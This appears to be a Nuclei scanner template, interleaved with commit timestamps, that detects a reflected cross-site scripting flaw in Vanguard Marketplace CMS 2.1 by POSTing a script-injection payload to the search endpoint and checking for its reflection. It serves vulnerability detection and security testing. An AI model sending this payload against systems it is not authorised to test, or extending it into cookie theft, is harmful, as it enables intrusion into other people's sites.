2021-11-04 15:12:47 +00:00
id : vanguard-post-xss
info :
2022-09-23 17:53:08 +00:00
name : Vanguard Marketplace CMS 2.1 - Cross-Site Scripting
2021-11-04 15:12:47 +00:00
author : ImNightmaree
2022-09-23 17:53:08 +00:00
severity : high
description : Vanguard Marketplace CMS 2.1 contains a cross-site scripting vulnerability in the message and product title tags and in the product search box.
2022-04-22 10:38:41 +00:00
reference :
- https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html
2022-09-23 17:53:08 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : vanguard,xss,packetstorm
2021-11-04 15:12:47 +00:00
requests :
- raw :
- |
POST /search HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2021-11-05 00:31:59 +00:00
2021-11-05 16:06:53 +00:00
phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2021-11-05 00:31:59 +00:00
2021-11-04 15:12:47 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-11-05 16:06:53 +00:00
- "</script><script>alert(document.domain)</script>"
part : body
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-23 17:53:08 +00:00
# Enhanced by mp on 2022/09/23